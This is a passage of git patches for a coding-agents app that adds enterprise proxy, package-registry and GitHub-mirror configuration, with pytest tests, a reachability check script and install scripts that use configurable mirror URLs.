+        monkeypatch.setenv("https_proxy", "http://lower:3128")
+        from enterprise_config import proxy_env
+
+        result = proxy_env()
+        # Lowercase already in environment — proxy_env shouldn't re-mirror over it
+        assert (
+            "https_proxy" not in result
+            or result.get("https_proxy") == "http://upper:3128"
+        )
+
+    def test_skips_blank_values(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "")
+        from enterprise_config import proxy_env
+
+        assert "HTTPS_PROXY" not in proxy_env()
+
+
+# ---------------------------------------------------------------------------
+# 3. uv_env — index URL + auth + scoped indexes
+# ---------------------------------------------------------------------------
+
+
+class TestUvEnv:
+    def test_empty_when_unset(self):
+        from enterprise_config import uv_env
+
+        assert uv_env() == {}
+
+    def test_index_url(self, monkeypatch):
+        monkeypatch.setenv(
+            "UV_DEFAULT_INDEX", "https://jfrog/api/pypi/pypi-virtual/simple/"
+        )
+        from enterprise_config import uv_env
+
+        assert (
+            uv_env()["UV_DEFAULT_INDEX"]
+            == "https://jfrog/api/pypi/pypi-virtual/simple/"
+        )
+
+    def test_timeout(self, monkeypatch):
+        monkeypatch.setenv("UV_HTTP_TIMEOUT", "120")
+        from enterprise_config import uv_env
+
+        assert uv_env()["UV_HTTP_TIMEOUT"] == "120"
+
+    def test_index_auth_pairs_forwarded(self, monkeypatch):
+        monkeypatch.setenv("UV_INDEX_INTERNAL_USERNAME", "svc-bot")
+        monkeypatch.setenv("UV_INDEX_INTERNAL_PASSWORD", "secret")
+        from enterprise_config import uv_env
+
+        result = uv_env()
+        assert result["UV_INDEX_INTERNAL_USERNAME"] == "svc-bot"
+        assert result["UV_INDEX_INTERNAL_PASSWORD"] == "secret"
+
+
+# ---------------------------------------------------------------------------
+# 4. npm_env — npm_config_registry + auth-token key
+# ---------------------------------------------------------------------------
+
+
+class TestNpmEnv:
+    def test_empty_when_unset(self):
+        from enterprise_config import npm_env
+
+        assert npm_env() == {}
+
+    def test_registry_only(self, monkeypatch):
+        monkeypatch.setenv(
+            "NPM_REGISTRY", "https://jfrog.example.com/api/npm/npm-virtual/"
+        )
+        from enterprise_config import npm_env
+
+        result = npm_env()
+        assert (
+            result["npm_config_registry"]
+            == "https://jfrog.example.com/api/npm/npm-virtual/"
+        )
+        # No token configured -> no auth key
+        assert not any(k.startswith("npm_config_//") for k in result)
+
+    def test_registry_with_token(self, monkeypatch):
+        monkeypatch.setenv(
+            "NPM_REGISTRY", "https://jfrog.example.com/api/npm/npm-virtual/"
+        )
+        monkeypatch.setenv("NPM_TOKEN", "tok-abc")
+        from enterprise_config import npm_env
+
+        result = npm_env()
+        assert result["npm_config_//jfrog.example.com/:_authToken"] == "tok-abc"
+
+    def test_token_without_registry_ignored(self, monkeypatch):
+        """Token alone is meaningless — there's no host to attach it to."""
+        monkeypatch.setenv("NPM_TOKEN", "tok-abc")
+        from enterprise_config import npm_env
+
+        assert npm_env() == {}
+
+
+# ---------------------------------------------------------------------------
+# 5. subprocess_env — merge semantics
+# ---------------------------------------------------------------------------
+
+
+class TestSubprocessEnv:
+    def test_includes_base_env(self, monkeypatch):
+        monkeypatch.setenv("FOO", "bar")
+        from enterprise_config import subprocess_env
+
+        env = subprocess_env()
+        assert env["FOO"] == "bar"
+
+    def test_overlays_enterprise_vars(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        monkeypatch.setenv("UV_DEFAULT_INDEX", "https://internal/")
+        monkeypatch.setenv("NPM_REGISTRY", "https://internal-npm/")
+        from enterprise_config import subprocess_env
+
+        env = subprocess_env()
+        assert env["HTTPS_PROXY"] == "http://proxy:3128"
+        assert env["UV_DEFAULT_INDEX"] == "https://internal/"
+        assert env["npm_config_registry"] == "https://internal-npm/"
+
+    def test_empty_base_isolates_additions(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        from enterprise_config import subprocess_env
+
+        env = subprocess_env(base={})
+        # No PATH, no HOME — just the enterprise contribution
+        assert env == {
+            "HTTPS_PROXY": "http://proxy:3128",
+            "https_proxy": "http://proxy:3128",
+        }
+
+
+# ---------------------------------------------------------------------------
+# 6. write_npmrc — file contents + idempotency
+# ---------------------------------------------------------------------------
+
+
+class TestWriteNpmrc:
+    def test_noop_when_registry_unset(self, tmp_path):
+        from enterprise_config import write_npmrc
+
+        assert write_npmrc(tmp_path) is None
+        assert not (tmp_path / ".npmrc").exists()
+
+    def test_writes_registry_line(self, tmp_path, monkeypatch):
+        monkeypatch.setenv(
+            "NPM_REGISTRY", "https://jfrog.example.com/api/npm/npm-virtual/"
+        )
+        from enterprise_config import write_npmrc
+
+        path = write_npmrc(tmp_path)
+        assert path == tmp_path / ".npmrc"
+        text = path.read_text()
+        assert "registry=https://jfrog.example.com/api/npm/npm-virtual/" in text
+
+    def test_writes_auth_token_line(self, tmp_path, monkeypatch):
+        monkeypatch.setenv(
+            "NPM_REGISTRY", "https://jfrog.example.com/api/npm/npm-virtual/"
+        )
+        monkeypatch.setenv("NPM_TOKEN", "tok-abc")
+        from enterprise_config import write_npmrc
+
+        path = write_npmrc(tmp_path)
+        text = path.read_text()
+        assert "//jfrog.example.com/:_authToken=tok-abc" in text
+
+    def test_idempotent(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://example.com/npm/")
+        from enterprise_config import write_npmrc
+
+        path = write_npmrc(tmp_path)
+        first_mtime = path.stat().st_mtime_ns
+        # Re-run — should not rewrite (same content)
+        write_npmrc(tmp_path)
+        assert path.stat().st_mtime_ns == first_mtime
+
+    def test_overwrites_on_content_change(self, tmp_path, monkeypatch):
+        from enterprise_config import write_npmrc
+
+        monkeypatch.setenv("NPM_REGISTRY", "https://old.example.com/npm/")
+        path = write_npmrc(tmp_path)
+        assert "old.example.com" in path.read_text()
+        monkeypatch.setenv("NPM_REGISTRY", "https://new.example.com/npm/")
+        write_npmrc(tmp_path)
+        assert "new.example.com" in path.read_text()
+
+
+# ---------------------------------------------------------------------------
+# 7. mirror_github_release / mirror_github_api
+# ---------------------------------------------------------------------------
+
+
+class TestMirrorGithubRelease:
+    def test_passthrough_when_mirror_unset(self):
+        from enterprise_config import mirror_github_release
+
+        url = "https://github.com/cli/cli/releases/download/v2.50.0/gh.tar.gz"
+        assert mirror_github_release(url) == url
+
+    def test_rewrites_when_mirror_set(self, monkeypatch):
+        monkeypatch.setenv(
+            "GITHUB_RELEASE_MIRROR",
+            "https://jfrog.example.com/artifactory/github-mirror",
+        )
+        from enterprise_config import mirror_github_release
+
+        result = mirror_github_release(
+            "https://github.com/cli/cli/releases/download/v2.50.0/gh.tar.gz"
+        )
+        assert result == (
+            "https://jfrog.example.com/artifactory/github-mirror"
+            "/cli/cli/releases/download/v2.50.0/gh.tar.gz"
+        )
+
+    def test_strips_trailing_slash_from_mirror(self, monkeypatch):
+        monkeypatch.setenv("GITHUB_RELEASE_MIRROR", "https://mirror.example.com/")
+        from enterprise_config import mirror_github_release
+
+        result = mirror_github_release(
+            "https://github.com/foo/bar/releases/download/v1/a.zip"
+        )
+        assert result == "https://mirror.example.com/foo/bar/releases/download/v1/a.zip"
+
+    def test_non_github_url_unchanged(self, monkeypatch):
+        monkeypatch.setenv("GITHUB_RELEASE_MIRROR", "https://mirror.example.com")
+        from enterprise_config import mirror_github_release
+
+        result = mirror_github_release("https://example.com/foo")
+        assert result == "https://example.com/foo"
+
+    def test_empty_url_unchanged(self):
+        from enterprise_config import mirror_github_release
+
+        assert mirror_github_release("") == ""
+
+
+class TestMirrorGithubApi:
+    def test_passthrough_when_base_unset(self):
+        from enterprise_config import mirror_github_api
+
+        url = "https://api.github.com/repos/cli/cli/releases/latest"
+        assert mirror_github_api(url) == url
+
+    def test_rewrites_when_base_set(self, monkeypatch):
+        monkeypatch.setenv("GITHUB_API_BASE", "https://ghe.example.com/api/v3")
+        from enterprise_config import mirror_github_api
+
+        result = mirror_github_api(
+            "https://api.github.com/repos/cli/cli/releases/latest"
+        )
+        assert result == "https://ghe.example.com/api/v3/repos/cli/cli/releases/latest"
+
+    def test_non_github_api_unchanged(self, monkeypatch):
+        monkeypatch.setenv("GITHUB_API_BASE", "https://ghe.example.com/api/v3")
+        from enterprise_config import mirror_github_api
+
+        result = mirror_github_api("https://example.com/foo")
+        assert result == "https://example.com/foo"
+
+
+# ---------------------------------------------------------------------------
+# 8. URL overrides (Claude installer, Hermes pip, MCP URLs)
+# ---------------------------------------------------------------------------
+
+
+class TestUrlOverrides:
+    def test_claude_installer_default(self):
+        from enterprise_config import claude_installer_url
+
+        assert claude_installer_url() == "https://claude.ai/install.sh"
+
+    def test_claude_installer_override(self, monkeypatch):
+        monkeypatch.setenv(
+            "CLAUDE_INSTALLER_URL", "https://mirror.example.com/claude-install.sh"
+        )
+        from enterprise_config import claude_installer_url
+
+        assert claude_installer_url() == "https://mirror.example.com/claude-install.sh"
+
+    def test_hermes_pip_default(self):
+        from enterprise_config import hermes_pip_url
+
+        assert (
+            hermes_pip_url() == "git+https://github.com/NousResearch/hermes-agent.git"
+        )
+
+    def test_hermes_pip_override(self, monkeypatch):
+        monkeypatch.setenv("HERMES_PIP_URL", "hermes-agent==1.2.3")
+        from enterprise_config import hermes_pip_url
+
+        assert hermes_pip_url() == "hermes-agent==1.2.3"
+
+    def test_deepwiki_default(self):
+        from enterprise_config import deepwiki_mcp_url
+
+        assert deepwiki_mcp_url() == "https://mcp.deepwiki.com/mcp"
+
+    def test_deepwiki_explicitly_disabled(self, monkeypatch):
+        """Empty string means "drop this MCP server entirely"."""
+        monkeypatch.setenv("DEEPWIKI_MCP_URL", "")
+        from enterprise_config import deepwiki_mcp_url
+
+        assert deepwiki_mcp_url() is None
+
+    def test_deepwiki_override(self, monkeypatch):
+        monkeypatch.setenv(
+            "DEEPWIKI_MCP_URL", "https://internal-mcp.example.com/deepwiki"
+        )
+        from enterprise_config import deepwiki_mcp_url
+
+        assert deepwiki_mcp_url() == "https://internal-mcp.example.com/deepwiki"
+
+    def test_exa_explicitly_disabled(self, monkeypatch):
+        monkeypatch.setenv("EXA_MCP_URL", "")
+        from enterprise_config import exa_mcp_url
+
+        assert exa_mcp_url() is None
+
+
+# ---------------------------------------------------------------------------
+# 9. startup_banner — secret masking and content
+# ---------------------------------------------------------------------------
+
+
+class TestStartupBanner:
+    def test_unset_vars_marked(self):
+        from enterprise_config import startup_banner
+
+        out = startup_banner()
+        assert "ENTERPRISE_MODE=<unset>" in out
+        assert "NPM_REGISTRY=<unset>" in out
+
+    def test_set_vars_shown(self, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://jfrog.example.com/api/npm/")
+        from enterprise_config import startup_banner
+
+        out = startup_banner()
+        assert "NPM_REGISTRY=https://jfrog.example.com/api/npm/" in out
+
+    def test_npm_token_masked(self, monkeypatch):
+        monkeypatch.setenv("NPM_TOKEN", "tok-supersecret")
+        from enterprise_config import startup_banner
+
+        out = startup_banner()
+        assert "tok-supersecret" not in out
+        assert "NPM_TOKEN=***" in out
+
+    def test_url_userinfo_password_masked(self, monkeypatch):
+        """URLs of the form https://user:pass@host should have the password redacted."""
+        monkeypatch.setenv(
+            "UV_DEFAULT_INDEX",
+            "https://svc-bot:topsecret@jfrog.example.com/api/pypi/simple/",
+        )
+        from enterprise_config import startup_banner
+
+        out = startup_banner()
+        assert "topsecret" not in out
+        assert "svc-bot:***@jfrog.example.com" in out
+
+
+# ---------------------------------------------------------------------------
+# 10. missing_when_enabled — warning surface
+# ---------------------------------------------------------------------------
+
+
+class TestMissingWhenEnabled:
+    def test_empty_when_not_enabled(self):
+        from enterprise_config import missing_when_enabled
+
+        assert missing_when_enabled() == []
+
+    def test_lists_recommended_when_enabled(self, monkeypatch):
+        monkeypatch.setenv("ENTERPRISE_MODE", "true")
+        from enterprise_config import missing_when_enabled
+
+        result = missing_when_enabled()
+        assert set(result) == {
+            "UV_DEFAULT_INDEX",
+            "NPM_REGISTRY",
+            "GITHUB_RELEASE_MIRROR",
+        }
+
+    def test_partial_config(self, monkeypatch):
+        monkeypatch.setenv("ENTERPRISE_MODE", "true")
+        monkeypatch.setenv("NPM_REGISTRY", "https://internal/")
+        from enterprise_config import missing_when_enabled
+
+        result = missing_when_enabled()
+        assert "NPM_REGISTRY" not in result
+        assert "UV_DEFAULT_INDEX" in result
+
+
+# ---------------------------------------------------------------------------
+# 11. bootstrap — side effects and idempotency
+# ---------------------------------------------------------------------------
+
+
+class TestBootstrap:
+    def test_writes_npmrc_when_registry_set(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://jfrog.example.com/api/npm/")
+        from enterprise_config import bootstrap
+
+        bootstrap(home=tmp_path)
+        assert (tmp_path / ".npmrc").exists()
+
+    def test_pushes_npm_config_env(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://internal/")
+        from enterprise_config import bootstrap
+
+        bootstrap(home=tmp_path)
+        assert os.environ.get("npm_config_registry") == "https://internal/"
+
+    def test_setdefault_preserves_operator_value(self, tmp_path, monkeypatch):
+        """An operator who manually set npm_config_registry wins over our derived value."""
+        monkeypatch.setenv("NPM_REGISTRY", "https://internal/")
+        monkeypatch.setenv("npm_config_registry", "https://manual-override/")
+        from enterprise_config import bootstrap
+
+        bootstrap(home=tmp_path)
+        assert os.environ["npm_config_registry"] == "https://manual-override/"
+
+    def test_logs_banner(self, tmp_path, caplog):
+        from enterprise_config import bootstrap
+
+        with caplog.at_level("INFO"):
+            bootstrap(home=tmp_path)
+        assert any(
+            "enterprise_config: effective settings" in r.message for r in caplog.records
+        )
+
+    def test_warns_on_missing_recommended_when_enabled(
+        self, tmp_path, monkeypatch, caplog
+    ):
+        monkeypatch.setenv("ENTERPRISE_MODE", "true")
+        from enterprise_config import bootstrap
+
+        with caplog.at_level("WARNING"):
+            bootstrap(home=tmp_path)
+        assert any(
+            "recommended mirrors are unset" in r.message and "NPM_REGISTRY" in r.message
+            for r in caplog.records
+        )
+
+    def test_no_warning_when_disabled(self, tmp_path, monkeypatch, caplog):
+        from enterprise_config import bootstrap
+
+        with caplog.at_level("WARNING"):
+            bootstrap(home=tmp_path)
+        assert not any(
+            "recommended mirrors are unset" in r.message for r in caplog.records
+        )
+
+
+# ---------------------------------------------------------------------------
+# 12. doctor — reachability with injected http_get
+# ---------------------------------------------------------------------------
+
+
+class TestDoctor:
+    def test_empty_targets_when_nothing_configured(self):
+        from enterprise_config import doctor_targets
+
+        assert doctor_targets() == []
+
+    def test_targets_only_include_configured_vars(self, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://internal-npm/")
+        monkeypatch.setenv("UV_DEFAULT_INDEX", "https://internal-pypi/")
+        from enterprise_config import doctor_targets
+
+        targets = dict(doctor_targets())
+        assert targets == {
+            "NPM_REGISTRY": "https://internal-npm/",
+            "UV_DEFAULT_INDEX": "https://internal-pypi/",
+        }
+
+    def test_doctor_reports_reachable(self, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://internal-npm/")
+        from enterprise_config import doctor
+
+        def fake_get(url):
+            return mock.Mock(status_code=200)
+
+        results = doctor(http_get=fake_get)
+        assert results == [("NPM_REGISTRY", "https://internal-npm/", True, "HTTP 200")]
+
+    def test_doctor_reports_unreachable(self, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://unreachable/")
+        from enterprise_config import doctor
+
+        def fake_get(url):
+            raise ConnectionError("name resolution failed")
+
+        results = doctor(http_get=fake_get)
+        assert results[0][:3] == ("NPM_REGISTRY", "https://unreachable/", False)
+        assert "name resolution failed" in results[0][3]
+
+
+# ---------------------------------------------------------------------------
+# 13. shell_export_lines — debug shell replay
+# ---------------------------------------------------------------------------
+
+
+class TestShellExport:
+    def test_empty_when_nothing_set(self):
+        from enterprise_config import shell_export_lines
+
+        assert shell_export_lines() == []
+
+    def test_renders_export_lines(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        from enterprise_config import shell_export_lines
+
+        lines = shell_export_lines()
+        assert "export HTTPS_PROXY='http://proxy:3128'" in lines
+
+    def test_escapes_single_quotes(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://o'malley:3128")
+        from enterprise_config import shell_export_lines
+
+        lines = shell_export_lines()
+        # Standard shell-escape pattern: close, escape, reopen
+        assert any("o'\\''malley" in line for line in lines)

From 348efbc3657deb871c1e44a42cf02a1e78da5fc8 Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Wed, 13 May 2026 13:38:34 +1000
Subject: [PATCH 02/10] feat(enterprise): wire enterprise_config + mirror-aware
 install scripts
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

PR 2 of 4 in the enterprise-hardening series — turns the env-var contract
introduced in PR 1 into actual behaviour. With no enterprise env vars set
the behaviour is unchanged; setting any var redirects the corresponding
reach to the internal mirror.

- app.py: call enterprise_config.bootstrap() at the top of run_setup() so
  ~/.npmrc is written and derived vars (npm_config_registry, CURL_CA_BUNDLE,
  proxy mirrors, etc.) land in os.environ before any subprocess fires.
  Every _run_step inherits them automatically via `env = os.environ.copy()`.

- install_databricks_cli.sh, install_gh.sh, install_micro.sh: replace
  hardcoded api.github.com / github.com with GH_API / GH_RELEASES vars
  derived from GITHUB_API_BASE / GITHUB_RELEASE_MIRROR (public fallback).
  Three-line patch each; no other behaviour touched.

- enterprise_config: extend proxy_env() to mirror REQUESTS_CA_BUNDLE into
  CURL_CA_BUNDLE + SSL_CERT_FILE so install_*.sh pick up the corporate
  root CA without explicit --cacert handling. 2 new tests, 74 total
  passing.

- scripts/enterprise_doctor.py + `make enterprise-doctor`: pre-deploy
  reachability check. Probes every configured target and reports PASS/FAIL.
  Uses .venv/bin/python directly when available so it doesn't itself
  trigger a uv resolve (the failure mode it's meant to diagnose).

Default-behaviour smoke: `make enterprise-doctor` with no vars set prints
the banner and "No enterprise targets configured" — no network calls, no
errors. `uv run python -c "import app"` still imports cleanly.

Co-authored-by: Isaac
---
 Makefile                        | 13 ++++++-
 app.py                          |  7 ++++
 enterprise_config.py            |  9 +++++
 install_databricks_cli.sh       |  9 ++++-
 install_gh.sh                   | 11 ++++--
 install_micro.sh                | 13 +++++--
 scripts/enterprise_doctor.py    | 65 +++++++++++++++++++++++++++++++++
 tests/test_enterprise_config.py | 19 ++++++++++
 8 files changed, 136 insertions(+), 10 deletions(-)
 create mode 100644 scripts/enterprise_doctor.py

diff --git a/Makefile b/Makefile
index 6b10c9c..16030c0 100644
--- a/Makefile
+++ b/Makefile
@@ -22,7 +22,7 @@ APP_NAME      ?= coding-agents
 USER_EMAIL    = $(shell databricks current-user me --profile $(PROFILE) --output json 2>/dev/null | python3 -c "import sys,json; print(json.load(sys.stdin).get('userName',''))")
 WORKSPACE_PATH = /Workspace/Users/$(USER_EMAIL)/apps/$(APP_NAME)
 
-.PHONY: help test deploy redeploy create-app create-pat sync deploy-app status open clean
+.PHONY: help test deploy redeploy create-app create-pat sync deploy-app status open clean enterprise-doctor
 
 # ── Help ─────────────────────────────────────────────
 
@@ -92,6 +92,17 @@ open: ## Open the app in browser
 		| python3 -c "import sys,json; print(json.load(sys.stdin).get('url',''))" \
 		| xargs open
 
+# ── Enterprise mode ─────────────────────────────────
+
+enterprise-doctor: ## Probe configured enterprise mirrors (PyPI, npm, GitHub) for reachability
+	@# Use the existing venv directly so the doctor doesn't itself trigger a uv resolve
+	@# (which would fail if PyPI is firewalled — the exact scenario this target diagnoses).
+	@if [ -x .venv/bin/python ]; then \
+		.venv/bin/python scripts/enterprise_doctor.py; \
+	else \
+		uv run python scripts/enterprise_doctor.py; \
+	fi
+
 # ── Cleanup (destructive) ───────────────────────────
 
 clean: ## Remove the app (destructive)
diff --git a/app.py b/app.py
index 0c63cad..8415fc0 100644
--- a/app.py
+++ b/app.py
@@ -21,6 +21,7 @@
 import requests
 
 import app_state
+import enterprise_config
 from utils import ensure_https, get_gateway_host
 from pat_rotator import PATRotator
 from telemetry import log_telemetry, set_product_info
@@ -343,6 +344,12 @@ def run_setup():
         setup_state["status"] = "running"
         setup_state["started_at"] = time.time()
 
+    # Apply enterprise (proxy/registry) config before any subprocess runs:
+    # writes ~/.npmrc, pushes derived env vars (npm_config_registry, CURL_CA_BUNDLE,
+    # etc.) into os.environ so every child process inherits them, and logs a
+    # banner of the effective config. No-op when no enterprise env vars are set.
+    enterprise_config.bootstrap()
+
     # Probe AI Gateway once; result is cached in _GATEWAY_RESOLVED for subprocesses
     from utils import resolve_and_cache_gateway
     resolve_and_cache_gateway()
diff --git a/enterprise_config.py b/enterprise_config.py
index a1878f5..6632aeb 100644
--- a/enterprise_config.py
+++ b/enterprise_config.py
@@ -136,6 +136,9 @@ def proxy_env() -> dict[str, str]:
 
     Includes both upper- and lower-case spellings because some tools only
     consult one (curl looks at lowercase; many Python libs look at uppercase).
+    Also mirrors REQUESTS_CA_BUNDLE to CURL_CA_BUNDLE and SSL_CERT_FILE so
+    the install_*.sh scripts pick up the corporate root CA without needing
+    explicit --cacert flags.
     """
     upper = _passthrough(
         "HTTPS_PROXY",
@@ -144,6 +147,7 @@ def proxy_env() -> dict[str, str]:
         "REQUESTS_CA_BUNDLE",
         "NODE_EXTRA_CA_CERTS",
         "SSL_CERT_FILE",
+        "CURL_CA_BUNDLE",
     )
     # Mirror to lowercase for curl/wget which only honour lowercase.
     mirrored = dict(upper)
@@ -154,6 +158,11 @@ def proxy_env() -> dict[str, str]:
     ):
         if upper_name in upper and lower_name not in os.environ:
             mirrored[lower_name] = upper[upper_name]
+    # Mirror REQUESTS_CA_BUNDLE to curl/openssl flavours so shell scripts
+    # don't need explicit --cacert handling.
+    if ca := upper.get("REQUESTS_CA_BUNDLE"):
+        mirrored.setdefault("CURL_CA_BUNDLE", ca)
+        mirrored.setdefault("SSL_CERT_FILE", ca)
     return mirrored
 
 
diff --git a/install_databricks_cli.sh b/install_databricks_cli.sh
index 5409533..8e2c449 100644
--- a/install_databricks_cli.sh
+++ b/install_databricks_cli.sh
@@ -10,13 +10,18 @@ set -euo pipefail
 INSTALL_DIR="$HOME/.local/bin"
 mkdir -p "$INSTALL_DIR"
 
+# Enterprise mode: redirect upstream URLs to internal mirrors when configured.
+# See docs/enterprise.md for the env-var contract.
+GH_API="${GITHUB_API_BASE:-https://api.github.com}"
+GH_RELEASES="${GITHUB_RELEASE_MIRROR:-https://github.com}"
+
 # Fetch latest release tag
-DB_CLI_VERSION=$(curl -fsSL "https://api.github.com/repos/databricks/cli/releases/latest" \
+DB_CLI_VERSION=$(curl -fsSL "${GH_API}/repos/databricks/cli/releases/latest" \
   | python3 -c "import sys, json; print(json.load(sys.stdin)['tag_name'].lstrip('v'))")
 
 echo "Installing Databricks CLI v${DB_CLI_VERSION}"
 
-curl -fsSL "https://github.com/databricks/cli/releases/download/v${DB_CLI_VERSION}/databricks_cli_${DB_CLI_VERSION}_linux_amd64.zip" \
+curl -fsSL "${GH_RELEASES}/databricks/cli/releases/download/v${DB_CLI_VERSION}/databricks_cli_${DB_CLI_VERSION}_linux_amd64.zip" \
   -o /tmp/dbcli.zip
 unzip -o /tmp/dbcli.zip -d /tmp/dbcli
 mv /tmp/dbcli/databricks "$INSTALL_DIR/databricks"
diff --git a/install_gh.sh b/install_gh.sh
index c1a169d..3b704a0 100644
--- a/install_gh.sh
+++ b/install_gh.sh
@@ -11,8 +11,13 @@ set -euo pipefail
 INSTALL_DIR="$HOME/.local/bin"
 mkdir -p "$INSTALL_DIR"
 
+# Enterprise mode: redirect upstream URLs to internal mirrors when configured.
+# See docs/enterprise.md for the env-var contract.
+GH_API="${GITHUB_API_BASE:-https://api.github.com}"
+GH_RELEASES="${GITHUB_RELEASE_MIRROR:-https://github.com}"
+
 # Fetch latest release tag
-GH_VERSION=$(curl -fsSL "https://api.github.com/repos/cli/cli/releases/latest" \
+GH_VERSION=$(curl -fsSL "${GH_API}/repos/cli/cli/releases/latest" \
   | python3 -c "import sys, json; print(json.load(sys.stdin)['tag_name'].lstrip('v'))")
 
 echo "Installing GitHub CLI v${GH_VERSION}"
@@ -27,14 +32,14 @@ esac
 
 if [ "$_UNAME" = "Darwin" ]; then
   GH_ASSET="gh_${GH_VERSION}_macOS_${_ARCH}.zip"
-  curl -fsSL "https://github.com/cli/cli/releases/download/v${GH_VERSION}/${GH_ASSET}" \
+  curl -fsSL "${GH_RELEASES}/cli/cli/releases/download/v${GH_VERSION}/${GH_ASSET}" \
     -o /tmp/gh.zip
   unzip -q /tmp/gh.zip -d /tmp/gh_extract
   mv "/tmp/gh_extract/gh_${GH_VERSION}_macOS_${_ARCH}/bin/gh" "$INSTALL_DIR/gh"
   rm -rf /tmp/gh.zip /tmp/gh_extract
 else
   GH_ASSET="gh_${GH_VERSION}_linux_${_ARCH}.tar.gz"
-  curl -fsSL "https://github.com/cli/cli/releases/download/v${GH_VERSION}/${GH_ASSET}" \
+  curl -fsSL "${GH_RELEASES}/cli/cli/releases/download/v${GH_VERSION}/${GH_ASSET}" \
     -o /tmp/gh.tar.gz
   tar -xzf /tmp/gh.tar.gz -C /tmp
   mv "/tmp/gh_${GH_VERSION}_linux_${_ARCH}/bin/gh" "$INSTALL_DIR/gh"
diff --git a/install_micro.sh b/install_micro.sh
index c5d404a..6003144 100644
--- a/install_micro.sh
+++ b/install_micro.sh
@@ -17,8 +17,13 @@
 
 set -e -u
 
+# Enterprise mode: redirect upstream URLs to internal mirrors when configured.
+# See docs/enterprise.md for the env-var contract.
+GH_API="${GITHUB_API_BASE:-https://api.github.com}"
+GH_RELEASES="${GITHUB_RELEASE_MIRROR:-https://github.com}"
+
 githubLatestTag() {
-  latestJSON="$( eval "$http 'https://api.github.com/repos/$1/releases/latest'" 2>/dev/null )" || true
+  latestJSON="$( eval "$http '${GH_API}/repos/$1/releases/latest'" 2>/dev/null )" || true
 
   versionNumber=''
   if ! echo "$latestJSON" | grep 'API rate limit exceeded' >/dev/null 2>&1 ; then
@@ -30,7 +35,7 @@ githubLatestTag() {
   if [ "${versionNumber:-x}" = "x" ] ; then
     # Try to fallback to previous latest version detection method if curl is available
     if command -v curl >/dev/null 2>&1 ; then
-      if finalUrl="$( curl "https://github.com/$1/releases/latest" -s -L -I -o /dev/null -w '%{url_effective}' 2>/dev/null )" ; then
+      if finalUrl="$( curl "${GH_RELEASES}/$1/releases/latest" -s -L -I -o /dev/null -w '%{url_effective}' 2>/dev/null )" ; then
         trimmedVers="${finalUrl##*v}"
         if [ "${trimmedVers:-x}" != "x" ] ; then
           echo "$trimmedVers"
@@ -201,9 +206,9 @@ else
 fi
 
 echo "Latest Version: $TAG"
-echo "Downloading https://github.com/micro-editor/micro/releases/download/v$TAG/micro-$TAG-$platform.$extension"
+echo "Downloading ${GH_RELEASES}/micro-editor/micro/releases/download/v$TAG/micro-$TAG-$platform.$extension"
 
-eval "$http 'https://github.com/micro-editor/micro/releases/download/v$TAG/micro-$TAG-$platform.$extension'" > "micro.$extension"
+eval "$http '${GH_RELEASES}/micro-editor/micro/releases/download/v$TAG/micro-$TAG-$platform.$extension'" > "micro.$extension"
 
 case "$extension" in
   "zip") unzip -j "micro.$extension" -d "micro-$TAG" ;;
diff --git a/scripts/enterprise_doctor.py b/scripts/enterprise_doctor.py
new file mode 100644
index 0000000..009b58c
--- /dev/null
+++ b/scripts/enterprise_doctor.py
@@ -0,0 +1,65 @@
+#!/usr/bin/env python
+"""Pre-deploy reachability check for enterprise/proxy-mode CoDA.
+
+Runs every URL configured via the enterprise env-var contract through a
+single HTTP GET and reports PASS/FAIL. Intended to be run on the deployment
+host (Azure DevOps self-hosted agent, customer CI runner, etc.) before
+`make deploy` so connectivity problems surface before the app is sent to
+the Databricks workspace.
+
+Exit code:
+  0 — all configured targets reachable (or nothing configured to check).
+  1 — at least one target failed.
+
+Usage:
+  python scripts/enterprise_doctor.py
+  make enterprise-doctor
+"""
+
+from __future__ import annotations
+
+import sys
+from pathlib import Path
+
+# Add repo root to sys.path so this script works when run from anywhere.
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+import enterprise_config  # noqa: E402
+
+
+def main() -> int:
+    # Print the effective config first so the operator can correlate
+    # PASS/FAIL with the values they set.
+    for line in enterprise_config.startup_banner().splitlines():
+        print(line)
+    print()
+
+    targets = enterprise_config.doctor_targets()
+    if not targets:
+        print("No enterprise targets configured — nothing to probe.")
+        print("(Set UV_DEFAULT_INDEX, NPM_REGISTRY, GITHUB_RELEASE_MIRROR, etc.")
+        print(" in your environment to enable reachability checks.)")
+        return 0
+
+    results = enterprise_config.doctor()
+    width = max(len(name) for name, _, _, _ in results)
+    any_failed = False
+    for name, url, ok, detail in results:
+        marker = "[ OK ]" if ok else "[FAIL]"
+        print(f"{marker} {name:<{width}}  {url}  ({detail})")
+        if not ok:
+            any_failed = True
+
+    print()
+    if any_failed:
+        print(
+            "One or more targets are unreachable. The customer's network team "
+            "needs to allow egress (or fix the mirror config) before deploy."
+        )
+        return 1
+    print("All configured targets reachable.")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
diff --git a/tests/test_enterprise_config.py b/tests/test_enterprise_config.py
index 9de2661..4a2d916 100644
--- a/tests/test_enterprise_config.py
+++ b/tests/test_enterprise_config.py
@@ -24,6 +24,7 @@
     "REQUESTS_CA_BUNDLE",
     "NODE_EXTRA_CA_CERTS",
     "SSL_CERT_FILE",
+    "CURL_CA_BUNDLE",
     "UV_DEFAULT_INDEX",
     "UV_HTTP_TIMEOUT",
     "UV_INDEX_INTERNAL_USERNAME",
@@ -131,6 +132,24 @@ def test_skips_blank_values(self, monkeypatch):
 
         assert "HTTPS_PROXY" not in proxy_env()
 
